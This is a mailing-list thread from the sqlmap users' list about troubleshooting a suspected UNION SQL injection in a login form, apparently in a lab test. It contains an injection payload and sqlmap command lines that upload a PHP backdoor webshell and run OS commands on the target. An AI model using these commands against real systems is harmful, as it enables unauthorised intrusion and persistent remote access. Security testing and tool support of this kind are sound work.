Re: [sqlmap-users] File Write Error
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:26:51

I did not read your first email, so ignore my blitherings :)

On Fri, Mar 21, 2014 at 1:16 PM, Brandon Perry <bpe...@gm...> wrote:

> Brian,
>
> I expect the program is taking the input for username and truncating it,
> so ZAP sees the injection going in and a successful auth afterwards and
> assumes the payload worked. I think this is a poor assumption to make.
>
>
> On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> There is always a 302 redirect, so I am not sure how ZAP detected this as
>> a SQLi.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote:
>>
>>> Thanks for the quick response, Miroslav and Bernardo. It's very much
>>> appreciated! There is a UNION technique that is being reported by ZAP, but
>>> sqlmap isn't finding it and I haven't quite figured out how to simply tell
>>> it what to use explicitly. ZAP detects a UNION vulnerability on
>>> activate.php:
>>>
>>>
>>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>>>
>>> My attempts to input this have not been successful, so I'm not sure if
>>> it's a false positive or I'm not using sqlmap quite right (more likely).
>>>
>>> CMDLINE
>>> sqlmap -u "http://172.16.71.138:7879/activate.php"
>>> --data='act=auth-login&page=login&username=admin&password=admin' -p
>>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>>> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL
>>> select NULL --"
>>>
>>> As for the previous method, here's the attached file (on screen output
>>> was massive - password is "password"). End result "[09:01:51] [CRITICAL]
>>> all tested parameters appear to be not injectable. Also, you can try to
>>> rerun by providing either a valid value for option '--string' (or
>>> '--regexp')"
>>>
>>> Thanks for the help!
>>>
>>> Brian
>>>
>>>
>>>
>>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
>>>
>>>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> wrote:
>>>> > [...]
>>>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>>>> > first to sync to the GitHub repository) with the following syntax:
>>>>
>>>> Command line:
>>>>
>>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php"
>>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>>>> --parse-errors -t traffic.log --answers "language does the web server
>>>> support=4,do you want to use for writable=2,comma separate list of
>>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>>>
>>>> Feel free to report back the result, the entire standard output of
>>>> sqlmap and send me the traffic.log.
>>>>
>>>> Thank you.
>>>> Bernardo
>>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Learn Graph Databases - Download FREE O'Reilly Book
>>> "Graph Databases" is the definitive new guide to graph databases and their
>>> applications. Written by three acclaimed leaders in the field,
>>> this first edition is now available. Download your free book today!
>>> http://p.sf.net/sfu/13534_NeoTech
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website